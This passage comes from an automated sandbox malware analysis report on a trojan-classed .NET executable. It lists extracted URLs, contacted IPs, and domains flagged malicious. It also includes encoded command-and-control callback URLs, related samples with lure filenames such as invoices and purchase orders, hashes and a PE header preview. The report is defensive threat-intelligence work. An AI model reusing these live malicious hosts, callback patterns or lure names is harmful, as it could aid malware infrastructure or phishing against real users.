                                                          http://www.founder.com.cn/cn/cThes6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cns6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-jones.htmls6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleases6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fonts.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleases6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cns6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/names6G3ZtvHZg.exe, 00000000.00000002.252345146.00000000028D1000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.sakkal.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.7.67
                                                                  www.betbonusuk.comUnited States
                                                                  13335CLOUDFLARENETUStrue
                                                                  192.0.78.25
                                                                  emmajanetracy.comUnited States
                                                                  2635AUTOMATTICUStrue
                                                                  142.111.76.118
                                                                  www.theartsutra.comUnited States
                                                                  18779EGIHOSTINGUStrue
                                                                  15.165.26.252
                                                                  www.okitmall.comUnited States
                                                                  16509AMAZON-02UStrue
                                                                  172.67.130.43
                                                                  www.chestfreezersale.xyzUnited States
                                                                  13335CLOUDFLARENETUStrue
                                                                  81.17.18.198
                                                                  www.moretuantired.comSwitzerland
                                                                  51852PLI-ASCHtrue
                                                                  52.206.71.220
                                                                  hotlightexpens.funUnited States
                                                                  14618AMAZON-AESUStrue
                                                                  52.56.126.26
                                                                  www.weluvweb.comUnited States
                                                                  16509AMAZON-02UStrue
                                                                  3.13.255.157
                                                                  prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                  16509AMAZON-02USfalse

                                                                  General Information

                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                  Analysis ID:385308
                                                                  Start date:12.04.2021
                                                                  Start time:10:01:30
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 12m 40s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:s6G3ZtvHZg.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:33
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@9/1@16/9
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 9.7% (good quality ratio 8.6%)
                                                                  • Quality average: 73.3%
                                                                  • Quality standard deviation: 32.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • TCP Packets have been reduced to 100
                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 92.122.145.220, 184.30.24.56, 168.61.161.212, 13.88.21.125, 20.82.209.183, 13.64.90.137, 92.122.213.194, 92.122.213.247, 2.16.218.147, 2.16.218.169, 104.42.151.234, 172.67.202.111, 104.21.90.158, 104.43.193.48, 52.155.217.156, 20.54.26.129, 104.43.139.144, 52.255.188.83
                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www.omxpro.com.cdn.cloudflare.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  10:02:33API Interceptor1x Sleep call for process: s6G3ZtvHZg.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  104.21.7.67AAXIFJn78w.exeGet hashmaliciousBrowse
                                                                  • www.betbonusuk.com/iu4d/?ETF8=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbQUHFSVt0xyq&URiPe=00DP1LExV2xHZfdP
                                                                  fNiff08dxi.exeGet hashmaliciousBrowse
                                                                  • www.betbonusuk.com/iu4d/?GFNDG=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbQUtailtwz6q&EHL0Sj=UvS0
                                                                  192.0.78.25g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?Ezut_6Ph=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&lhuLO=TxllZ2B
                                                                  12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                  • www.thevillaflora.com/hw6d/?NTxxLxi=N8T6HUVrx9rRdb/j5XhVNb6z86Vd/RUNSBbCMa2WOSBZ+Hf+0g8ju4CxDHwnLMWYR763luo+iQ==&Cj9LK=9rjlL0C
                                                                  Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?YPxxw=JxlLiTVHLV_&4h=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
                                                                  vbc.exeGet hashmaliciousBrowse
                                                                  • www.regalparkllc.com/nnmd/?VRNp=wBZl4vkh1&MvdD=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK
                                                                  RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                  • www.619savage.store/uwec/?CZ6=7nExZbW&v2=UXtrAnkUbxIt7Da+co89vc/yvelnirGGdixyijtvmiG0dXcVjZHX+cHMX+KvBOjcxYq/
                                                                  yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                  • www.longdoggy.net/vu9b/?OV0xlV=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2rZtS/Pp2iNH&wh=jL0xYFb0mbwHi
                                                                  g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?4h3=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&vTapK=LJBpc8p
                                                                  Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                                  • www.mels.ink/jzvu/?Cfw=iJYv1UkrTzZtiuEKuxHty87S2Dat4Pv7WpvfTrmOLEk2tcdYje0Px5XPsXKXm5aj0GbIDQ==&QDHH=nN980P
                                                                  RMwfvA9kZy.exeGet hashmaliciousBrowse
                                                                  • www.regalparkllc.com/nnmd/?c2Mh-=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK&tVm4=J690I
                                                                  ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?8p=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1Y8u0zs/SS1CQHpw==&ChOh3=H0Gdhfb
                                                                  loMStbzHSP.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?sZvD8l=Spap-DKpf&7nEpiRy=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1hjfUwipOV1CQA6A==
                                                                  CVE9362.exeGet hashmaliciousBrowse
                                                                  • www.colorblindwork.com/ksb/?ofuxZr=dWIaQL0PIzW1akyTL8Rl6DSxnESZDNu4upVzjJTzlVvTtXgXRqzkSDdoiRY4N8qhYGfg&1bg=onMPeNox4PLhS
                                                                  SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                                  • www.michaelroberts.gallery/m2be/?Et5pFP9=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaClCICcsINp3OOFeDA==&uDKLJ=D48t
                                                                  MV Sky Marine_pdf.exeGet hashmaliciousBrowse
                                                                  • www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW
                                                                  NEW ORDER_PDF.exeGet hashmaliciousBrowse
                                                                  • www.mamaoutloud.com/s8ri/?bl=UTChTb0hUjYl5Vd&Y2JpVVJ=u9elXLp277xnqVcwAnLNhuW6l0GYaPGhHfcVWexw3ERwjVjzs8/RHD/51sUEjByU9HeW
                                                                  32ciKQsy2X.exeGet hashmaliciousBrowse
                                                                  • www.earth-emily.com/4qdc/?AR-XJ2=Wph7KmTxuM3Gsk6JJA1oy52G3sDFb69RyaiHg2D5Z4a2zIwRuNgDhRaz3sbfTzDvPg+4&et-=XPJxZ2SpixNTl6pp
                                                                  Fym9exdpg8.exeGet hashmaliciousBrowse
                                                                  • www.espressoandhoney.com/gts/?9rkdzNqh=EzY5lfbdKr94xDCu9UGw63kyV4asBdh+DU/WNzhiAESrVolwAii5R+YbRjGRKuu5f9CU/7tXGg==&FR-8RX=3fCpm
                                                                  PO_210316.exe.exeGet hashmaliciousBrowse
                                                                  • www.ga-don.com/ntg/?tXUp=YP7DfZXHo&p0D=WOLsrCKcrV537zGLK3AUh+BiQyTRpI49VOz5B2TFxvfb2Jntw5H/Y3VWDNX0TqmXK6eo
                                                                  pVXFB33FzO.exeGet hashmaliciousBrowse
                                                                  • www.leadeligey.com/bw82/?VR-T8=l6AlF0u814LH_Lj&BRAh4F=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ
                                                                  EuDXqof7Tf.exeGet hashmaliciousBrowse
                                                                  • www.thehumboldtlife.com/smd0/?FPWlMXl=d6QrSWppnHOFtnwEPnVYTCwaC4pvPTP/peW/DzgbzQLmUmVOVerI/d+4OTFHCaVj4q0+&AlB=O2JtVnHxm

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comg2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  Wire Transfer Update.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  LtfVNumoON.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  giATspz5dw.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  New order.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  qRsvaKcvxZ.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  PO-RFQ # 097663899 pdf .exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  PO45937008ADENGY.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                  • 52.15.160.167
                                                                  8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  vbc.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  Order Inquiry.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  PaymentAdvice.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  BL01345678053567.exeGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                  • 3.14.206.30
                                                                  TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                  • 3.13.255.157
                                                                  www.moretuantired.comMV WAF PASSION.exeGet hashmaliciousBrowse
                                                                  • 81.17.18.198
                                                                  www.betbonusuk.comhvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                  • 172.67.187.138
                                                                  AAXIFJn78w.exeGet hashmaliciousBrowse
                                                                  • 104.21.7.67
                                                                  vfe1GoeC5F.exeGet hashmaliciousBrowse
                                                                  • 172.67.187.138
                                                                  fNiff08dxi.exeGet hashmaliciousBrowse
                                                                  • 104.21.7.67
                                                                  hotlightexpens.funMV WAF PASSION.exeGet hashmaliciousBrowse
                                                                  • 52.86.219.129
                                                                  AAXIFJn78w.exeGet hashmaliciousBrowse
                                                                  • 34.196.151.230
                                                                  Feb SOA.xlsxGet hashmaliciousBrowse
                                                                  • 54.144.3.29
                                                                  IMG001.exeGet hashmaliciousBrowse
                                                                  • 52.206.71.220
                                                                  www.getboostphlo.comhvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                  • 172.67.219.254

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  AUTOMATTICUSg2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.231
                                                                  Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  Purchase Order.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.78.172
                                                                  HG546092227865431209.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  invoice.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.175
                                                                  vbc.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  o2KKHvtb3c.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  PO#41000055885.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  BL836477488575.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.194
                                                                  FARASIS.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.79.33
                                                                  FARASIS.xlsxGet hashmaliciousBrowse
                                                                  • 192.0.79.32
                                                                  RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  swift_76567643.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.25
                                                                  Swift.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  TNUiVpymgH.exeGet hashmaliciousBrowse
                                                                  • 192.0.78.24
                                                                  CLOUDFLARENETUS4oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  ieuHgdpuPo.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  Payment Slip.docGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  INQUIRY 1820521 pdf.exeGet hashmaliciousBrowse
                                                                  • 104.21.82.58
                                                                  PaymentCopy.vbsGet hashmaliciousBrowse
                                                                  • 172.67.222.131
                                                                  PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                  • 104.21.28.135
                                                                  PO NUMBER 3120386 3120393 SIGNED.exeGet hashmaliciousBrowse
                                                                  • 1.2.3.4
                                                                  Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  BL2659618800638119374.xls.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  Purchase order and quote confirmation.exeGet hashmaliciousBrowse
                                                                  • 172.67.222.176
                                                                  Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  Re Confirm#U00ffthe invoice#U00ffthe payment slip.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  SOA.exeGet hashmaliciousBrowse
                                                                  • 104.21.19.200
                                                                  RFQ No A'4762GHTECHNICAL DETAILS.exeGet hashmaliciousBrowse
                                                                  • 104.21.19.200
                                                                  GQ5JvPEI6c.exeGet hashmaliciousBrowse
                                                                  • 104.21.17.57
                                                                  setupapp.exeGet hashmaliciousBrowse
                                                                  • 172.67.164.1
                                                                  g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • 172.67.161.4
                                                                  C++ Dropper.exeGet hashmaliciousBrowse
                                                                  • 104.21.50.92

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\s6G3ZtvHZg.exe.log
                                                                  Process:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):5.350128552078965
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.693808670494275
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:s6G3ZtvHZg.exe
                                                                  File size:893952
                                                                  MD5:885e567660a28ec23b692291587ef69f
                                                                  SHA1:9e200dd274b4be5df241719fe72f6403938a8561
                                                                  SHA256:fb23a007cf696e3c6b119c61b62824abc56b47a7e2f82337e890acc9024bd88c
                                                                  SHA512:e7d965fab740e6fa1d15da2d2ffaf41927edbc5b0af13745f0e30f3b1d09ef2009720a22ab6100ba9db2dea85f9bcb8322575a9d9179521ca56daf15034c7cbc
                                                                  SSDEEP:24576:Z0QVbXphtO83Ns/nzuzW59j+12Fih2TjvLe:7zjM8SvzuzW59j+1IimvL
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.s`..............P..............=... ...@....@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:d28ab3b0e0ab96c4

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4b3d16
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x60739D78 [Mon Apr 12 01:08:08 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
